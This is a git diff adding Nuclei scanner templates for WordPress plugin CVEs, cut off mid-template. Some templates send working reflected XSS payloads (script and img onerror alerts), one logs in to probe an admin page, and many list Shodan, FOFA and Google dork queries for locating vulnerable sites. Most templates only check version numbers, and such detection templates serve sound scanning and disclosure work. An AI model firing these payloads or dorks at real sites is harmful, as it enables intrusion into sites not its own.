Content-Type: application/x-www-form-urlencoded + + body: "action=wpcf7r_get_nonce¶m=wp_rest" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - '"success":true' + - '"nonce":"[a-f0-9]+"' + condition: and + + extractors: + - type: regex + part: body + regex: + - '"nonce":"[a-f0-9]+"' \ No newline at end of file diff --git a/poc/cve/CVE-2021-24389-5729.yaml b/poc/cve/CVE-2021-24389-5729.yaml new file mode 100644 index 0000000000..024f7e7b87 --- /dev/null +++ b/poc/cve/CVE-2021-24389-5729.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-24389 + +info: + name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 + tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24389 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-25120(1).yaml b/poc/cve/CVE-2021-25120(1).yaml new file mode 100644 index 0000000000..88e63fa569 --- /dev/null +++ b/poc/cve/CVE-2021-25120(1).yaml @@ -0,0 +1,60 @@ +id: CVE-2021-25120 + +info: + name: Easy Social Feed < 6.2.7 - Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. + remediation: | + Update to Easy Social Feed version 6.2.7 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 + - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25120 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25120 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* + metadata: + max-request: 2 + vendor: easysocialfeed + product: easy_social_feed + framework: wordpress + tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'type' : ''" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f3ce163f0a4245b48fadd091ce77fffda6474552e66006405db188add5f1336702210088a04491ecf1ec03bde9a145ed885d03c432c745e0df7266f322e4320502f4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0201(1).yaml b/poc/cve/CVE-2022-0201(1).yaml new file mode 100644 index 0000000000..bd225046da --- /dev/null +++ b/poc/cve/CVE-2022-0201(1).yaml @@ -0,0 +1,51 @@ +id: CVE-2022-0201 + +info: + name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 + - https://plugins.trac.wordpress.org/changeset/2656512 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0201 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40882 + cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: permalink_manager_lite_project + product: permalink_manager_lite + framework: wordpress + tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project + +http: + - method: GET + path: + - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'pm_query' + condition: and + + - type: word + part: header + words: + - text/html +# digest: 490a00463044022026f5edf6c9325db54e5dba0b0e39a8ad5fead51d43680b3a5a21b56c956d5c9202205b2e57c67c716336383fa1af54b8b29eec6b914edfbae42fbcbcc1f0f6e799aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-10453.yaml b/poc/cve/CVE-2024-10453.yaml new file mode 100644 index 0000000000..79703bcdc2 --- /dev/null +++ b/poc/cve/CVE-2024-10453.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10453-68cf66b7073e2bbdcfb231b1737ffdbf + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.25.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Typography Settings + author: topscoder + severity: low + description: > + The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typography Settings in all versions up to, and including, 3.25.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f23604b7-5a7f-4be7-bc73-cb4facdd1e73?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10453 + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:CVE-2024-10453' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.25.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10797.yaml b/poc/cve/CVE-2024-10797.yaml new file mode 100644 index 0000000000..a4b5f824d0 --- /dev/null +++ b/poc/cve/CVE-2024-10797.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10797-8735cd5ecd4eb322a4cce0b2bcfa0daf + +info: + name: > + Full Screen Menu for Elementor <= 1.0.7 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10797 + metadata: + fofa-query: "wp-content/plugins/full-screen-menu-for-elementor/" + google-query: inurl:"/wp-content/plugins/full-screen-menu-for-elementor/" + shodan-query: 'vuln:CVE-2024-10797' + tags: cve,wordpress,wp-plugin,full-screen-menu-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/full-screen-menu-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "full-screen-menu-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11196.yaml b/poc/cve/CVE-2024-11196.yaml new file mode 100644 index 0000000000..e9a4afcf48 --- /dev/null +++ b/poc/cve/CVE-2024-11196.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11196-f6d286fa677ac17e271cb0be03129144 + +info: + name: > + Multi-column Tag Map <= 17.0.33 - Authenticated (Contributor+) Stored Cross-Site Scripting via mctagmap Shortcode + author: topscoder + severity: low + description: > + The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mctagmap shortcode in all versions up to, and including, 17.0.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb41862a-0cde-46f0-bd86-5a04e76f7345?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11196 + metadata: + fofa-query: "wp-content/plugins/multi-column-tag-map/" + google-query: inurl:"/wp-content/plugins/multi-column-tag-map/" + shodan-query: 'vuln:CVE-2024-11196' + tags: cve,wordpress,wp-plugin,multi-column-tag-map,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/multi-column-tag-map/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "multi-column-tag-map" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 17.0.33') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml b/poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml new file mode 100644 index 0000000000..7bbd676400 --- /dev/null +++ b/poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636 + +info: + name: > + Schema App Structured Data <= 2.2.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Schema App Structured Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48db673c-f978-45f4-9d7b-eddd81cee62e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11279 + metadata: + fofa-query: "wp-content/plugins/schema-app-structured-data-for-schemaorg/" + google-query: inurl:"/wp-content/plugins/schema-app-structured-data-for-schemaorg/" + shodan-query: 'vuln:CVE-2024-11279' + tags: cve,wordpress,wp-plugin,schema-app-structured-data-for-schemaorg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/schema-app-structured-data-for-schemaorg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "schema-app-structured-data-for-schemaorg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11287.yaml b/poc/cve/CVE-2024-11287.yaml new file mode 100644 index 0000000000..e421b07e51 --- /dev/null +++ b/poc/cve/CVE-2024-11287.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11287-33536fea15ec5164056e1863a099338b + +info: + name: > + Ebook Store <= 5.8001 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8001. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/001289a3-a1a9-441f-b399-e9b699094e1a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11287 + metadata: + fofa-query: "wp-content/plugins/ebook-store/" + google-query: inurl:"/wp-content/plugins/ebook-store/" + shodan-query: 'vuln:CVE-2024-11287' + tags: cve,wordpress,wp-plugin,ebook-store,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ebook-store/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ebook-store" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.8001') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11349.yaml b/poc/cve/CVE-2024-11349.yaml new file mode 100644 index 0000000000..8cdc746e50 --- /dev/null +++ b/poc/cve/CVE-2024-11349.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11349-492c070998afb1c1259a8c8e6c2a2e7c + +info: + name: > + AdForest <= 5.1.6 - Authentication Bypass + author: topscoder + severity: critical + description: > + The AdForest theme for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.1.6. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the sb_login_user_with_otp_fun() function. This makes it possible for unauthenticated attackers to log in as arbitrary users, including administrators. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f374b3d1-820b-473f-8d2b-c3267e6d23d9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-11349 + metadata: + fofa-query: "wp-content/themes/adforest/" + google-query: inurl:"/wp-content/themes/adforest/" + shodan-query: 'vuln:CVE-2024-11349' + tags: cve,wordpress,wp-theme,adforest,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/adforest/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "adforest" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11682.yaml b/poc/cve/CVE-2024-11682.yaml new file mode 100644 index 0000000000..6c39cb2e61 --- /dev/null +++ b/poc/cve/CVE-2024-11682.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11682-f008a2d5e25cf2cd1eef864640aea744 + +info: + name: > + G Web Pro Store Locator <= 2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The G Web Pro Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'q' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11682 + metadata: + fofa-query: "wp-content/plugins/gwebpro-store-locator/" + google-query: inurl:"/wp-content/plugins/gwebpro-store-locator/" + shodan-query: 'vuln:CVE-2024-11682' + tags: cve,wordpress,wp-plugin,gwebpro-store-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gwebpro-store-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gwebpro-store-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11688.yaml b/poc/cve/CVE-2024-11688.yaml new file mode 100644 index 0000000000..ac6669f112 --- /dev/null +++ b/poc/cve/CVE-2024-11688.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11688-14d2a5f31dc0e4861931d1fc0c65a354 + +info: + name: > + LaTeX2HTML <= 2.5.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The LaTeX2HTML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ver' or 'date' parameter in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b3d9af8b-1168-462d-a767-d16ee660f646?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11688 + metadata: + fofa-query: "wp-content/plugins/latex2html/" + google-query: inurl:"/wp-content/plugins/latex2html/" + shodan-query: 'vuln:CVE-2024-11688' + tags: cve,wordpress,wp-plugin,latex2html,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/latex2html/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "latex2html" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11722.yaml b/poc/cve/CVE-2024-11722.yaml new file mode 100644 index 0000000000..ebef5fa607 --- /dev/null +++ b/poc/cve/CVE-2024-11722.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11722-13dedbf7f4be1ec6f6f6ff2a845970ec + +info: + name: > + Frontend Admin by DynamiApps <= 3.25.1 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.25.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This requires an unauthenticated user to have been given permission to view form submissions, and the form submission shortcode be added to a page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97cef309-da2f-461a-b5a3-3a85c540c7aa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 + cve-id: CVE-2024-11722 + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:CVE-2024-11722' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.25.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml b/poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml new file mode 100644 index 0000000000..a9c097f0d9 --- /dev/null +++ b/poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11763-7c77355461cb32e1d2f805bce3503999 + +info: + name: > + Plezi <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Plezi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'plezi' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/67768957-45be-48d9-ad5e-147290ef4cd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11763 + metadata: + fofa-query: "wp-content/plugins/plezi/" + google-query: inurl:"/wp-content/plugins/plezi/" + shodan-query: 'vuln:CVE-2024-11763' + tags: cve,wordpress,wp-plugin,plezi,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/plezi/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "plezi" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml b/poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml new file mode 100644 index 0000000000..f8c637fdd6 --- /dev/null +++ b/poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b + +info: + name: > + PCRecruiter Extensions <= 1.4.22 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The PCRecruiter Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PCRecruiter' shortcode in all versions up to, and including, 1.4.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d97e1ec3-321b-4d69-ab69-e3ecab0937b3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11776 + metadata: + fofa-query: "wp-content/plugins/pcrecruiter-extensions/" + google-query: inurl:"/wp-content/plugins/pcrecruiter-extensions/" + shodan-query: 'vuln:CVE-2024-11776' + tags: cve,wordpress,wp-plugin,pcrecruiter-extensions,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pcrecruiter-extensions/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pcrecruiter-extensions" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.22') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11808.yaml b/poc/cve/CVE-2024-11808.yaml new file mode 100644 index 0000000000..b781f1af64 --- /dev/null +++ b/poc/cve/CVE-2024-11808.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11808-e8f2f8bf443bbbf9f355079310951d95 + +info: + name: > + Pingmeter Uptime Monitoring <= 1.0.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11808 + metadata: + fofa-query: "wp-content/plugins/pingmeter-uptime-monitoring/" + google-query: inurl:"/wp-content/plugins/pingmeter-uptime-monitoring/" + shodan-query: 'vuln:CVE-2024-11808' + tags: cve,wordpress,wp-plugin,pingmeter-uptime-monitoring,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pingmeter-uptime-monitoring/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pingmeter-uptime-monitoring" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11811.yaml b/poc/cve/CVE-2024-11811.yaml new file mode 100644 index 0000000000..6e73ff9ecd --- /dev/null +++ b/poc/cve/CVE-2024-11811.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11811-931cffef1fe7884e7e5c1bc5b3f11a46 + +info: + name: > + Feedify – Web Push Notifications <= 2.4.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Feedify – Web Push Notifications plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'platform', 'phone', 'email', and 'store_url' parameters. in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a5a33fd-ecc6-40bf-93a5-10ead1c4c1f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11811 + metadata: + fofa-query: "wp-content/plugins/push-notification-by-feedify/" + google-query: inurl:"/wp-content/plugins/push-notification-by-feedify/" + shodan-query: 'vuln:CVE-2024-11811' + tags: cve,wordpress,wp-plugin,push-notification-by-feedify,medium + +http: + - method: GET + 